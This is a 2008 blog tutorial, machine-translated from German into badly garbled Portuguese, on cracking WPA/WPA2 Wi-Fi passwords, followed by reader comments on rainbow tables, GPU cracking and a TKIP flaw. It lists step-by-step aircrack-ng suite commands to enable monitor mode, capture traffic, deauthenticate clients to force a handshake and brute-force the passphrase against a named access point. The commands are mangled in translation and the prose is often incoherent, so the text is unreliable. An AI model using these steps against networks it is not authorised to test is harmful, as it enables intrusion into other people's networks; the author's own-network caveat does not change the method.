2008 Abril 03 2008
[Tutorial] WPA sem fios segura 'hack'
Com base em meu artigo "crack WEP sem fios segura (Fragmentação Attack)" Gostaria agora com este artigo mostra que a encriptação WPA ou WPA2 sua 'fraco' tem.
Ao contrário do PAM tem WPA / WPA2 si não 'vulnerabilidade'. Enquanto na fabricação de uma conexão cliente para a autenticação handshake mitgelesen e gravado, mas isso leva o atacante pouco se for usada uma boa senha. O ataque a estes aperto de mão ea senha só pode ser contida através da palavra e enumera os ataques Bruteforce feito. Com um forte senha podem ser de vários anos ou mesmo décadas.
Uma dica ainda prever:
A maneira mais fácil é se você precisar de informações, tais como 'BSSID »,« ESSID', 'cliente-MAC ", etc Variável lojas. Então você pode rápida e facilmente o acesso a conteúdos sem qualquer vezes ou ao tocar-lhes novas Copiar e Colar.
Informações (o mesmo que o WEP Crack)
BSSID da AP: 00:12: BF: 46:68: BD
ESSID da AP: N3ur0m4nc3r
Canal da AP: 01
MAC do adaptador sem fio: 00: C0: CA: 19: FF: 86
Wi-Fi e adaptador deve Packet Injection
Moda monitor apoio.
Como eu usei um sistema operativo assar Tema 3, o que eu tiver instalado sob VMware.
Instruções
- Iniciando a interface necessárias (neste caso, wlan0)
ifconfig wlan0 up
- Activar o modo de controlar o canal 1 (sobre a qual o nosso trabalho AP)
airmon-ng start wlan0 1
- Agora airodump-ng com os parâmetros adequados:
c-1 para o canal 1
-w arquivo nome para o arquivo a ser salvo
- Mac BSSID endereço do VA
wlan0 Interface
airodump ng-c-1-w neuro-WPA2 - BSSID 00:12: BF: 46:68: BD wlan0 - Então nós também podemos ler aperto de mão, um cliente deve registrar durante o tráfego de airodump-ng serão gravados.
Para todos os clientes, que atualmente estão conectados com o AP para separar (e assim se reconectar para animar) pode aireplay-ng um DeAuth ser executada.
-0 4 -> existem 4 pacotes enviados DeAuth
-a -> Mac endereço da AP
-c -> Mac endereço do cliente
aireplay-ng -0 4-um 00:12: BF: 46:68: BD-c 00:15:00:02: C8: 82
![wpa-deauth-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-deauth-thumb.jpg "wpa deauth polegar")
- Depois que o aperto de mão foi gravado, pode-aircrack-ng sobre a senha deve ser considerada. Esta situação pode, como já foi escrito acima, utilizando a senha ou lista Bruteforce ataque ocorrerá.
![wpa-handshake-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-handshake-thumb.jpg "wpa handshake polegar")
2-A -> ataque a WPA / WPA2
-b -> Mac endereço da AP
-e -> essid AP
-w -> caminho e nome do arquivo da palavra listas (também pode ser mais)
aircrack-ng-a 2-b 00:12: BF: 46:68: BD-e-w N3ur0m4nc3r cap <passwordfile> *.![wpa-aircrack-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-aircrack-thumb.jpg "wpa aircrack polegar")
![wpa-deauth-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-deauth.jpg "wpa deauth polegar")
![wpa-handshake-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-handshake.jpg "wpa handshake polegar")
![wpa-aircrack-thumb [Tutorial] WPA gesichertes WLAN hacken](http://www.feldstudie.net/wp-content/uploads/2008/04/wpa-aircrack.jpg "wpa aircrack polegar")
Mas gostaria de voltar a salientar que, na rede externa não tem nada a ver, se você não tiver a permissão do proprietário recebeu.
Melhor testar todos nós apenas na sua rede privada.
11 respostas até agora
11 comentários para "[Tutorial] WPA sem fios segura 'hack'"
Trackback URI | Comentários RSS
[...] WEP crack Turorial agora inclui instruções para Angeifen fraco "frases passe WPA publicado, e ao mesmo tempo aqui. O método é simples: Você de-autenticar todos os clientes que estiverem conectados à AP, e [...]
Belamente escrito e descreveu a fazer um grande obrigado pelo seu esforço
Continue assim!
absolutamente inadequada tutorial ... Use por john com stdout .. e não explicou o que é mais importante: Declaração precompilado hashtables completamente ausente ... grundlagentut informações seriam necessárias para crackar WPA, mas porque sem isso não faz sentido ;-)
Instituto se você escreve, você deveria, pelo menos, a página lê ferramenta para ter ---> www.aircrack-ng.org
@ Moebb:
1a John the Ripper neste tutorial não deveria ser conteúdo. Aqui se situava na linha da frente para mostrar que a EPA também tem as suas fraquezas. John seria um tutorial privado vezes valem.
2a Precompiled hashtables estão na EPA 'crack' como supérfluos como um bócio. Como APE com o ESSID em introduzir a chave, deverá ser possível para cada ESSID hashtables próprio projeto, tanto a partir do espaço, bem como de vista temporal não faz sentido.
3a Desde a minha tutoriais diretamente do lado da ferramenta tão verlnkt é ruim você não pode ser sim.
4a Talvez você deverá informar antecipadamente e não tão covarde e um gefakete endereço de e-mail.
Torsten ei ...
Primeiro, eu nem seu nome nem um link para você sobre o aircrack-ng colaterais encontrada .. talvez vezes você precisa dizer onde é.
então você tem muito naturalmente .. hashtables pode usar net .. Garnich sei porque tenho chamado, eu não quis! mas algo na arte:-D .. lá das suas actuais essid e senha angepasten lista ne sql lista e assim torná-lo emparelhados mestre chaves e "Loja" ... os testes velocidade aumenta tremendamente! embora ela ainda evidentemente líquidos realmente viável, mas tudo vai na direcção certa. para um grupo de pessoas, mas é ainda mais, a sua rede wpa viável ...
Vou procurar, se tiver outros interessantes tute pesquisado on-line. e sim torná-lo para um alemão fazendo john! .. ick acho que alguma coisa neste âmbito da líquidas detalhe
O segundo eo terceiro link aqui.
Também a partir PMK e essid e uma lista correspondente não faria muito sentido. Desde que ele de qualquer jeito para virtualmente qualquer WPA sem fio criar uma nova lista teria, você também pode usar a senha Bruteforcen ou listas. Para além do facto de a coisa toda é ilegal e mesmo assim você, em toda a história só para testar a sua própria casa para o teste de segurança deve ser.
A menos que eu, mais uma vez tenho mais tempo, o que não acontece actualmente, vou ser eventualmente fixado vezes.
Não é possível, o WPA handshakes por Aircrack com Bruteforce expulsos. Listas e só por isso é difícil. Sinto-me bastante seguro como WPA.
> Também a partir PMK e iria essid e uma correspondente lista> não faz muito sentido. Desde que ele de qualquer jeito para quase todos os> WPA sem fio criar uma nova lista teria, também é possível> Bruteforcen igual ou senha para usar listas.
Essas listas (mais precisamente: Rainbow Quadros) já existe na rede para descobrir. Acaba de 1000 o mais popular da ESSID alla Padrão, NETGEAR ... etc .. cada um com 1 milhão de senhas a partir de uma lista nominativa combinado. Faz sentido porque todo o saber ...
A EPA é tão boa como a história, mesmo sem o arco-íris Quadros. Com o software a partir de ElcomSoft e os mais grossos GPUs NVIDIA senhas são agora deixou de ser um problema. Além disso, o dia em uma vulnerabilidade TKIP ser publicado, ele permite que as chaves dentro de aproximadamente 15 minutos de crack (http://www.gulli.com/news/wlan-sicherheit-wpa-verschl-2008-11-07 /).
wpa se não mais seguro, o que deveria, desde então, como uma "Otto-usuários normais" fazer?
@ Desconhecido: WPA2 uso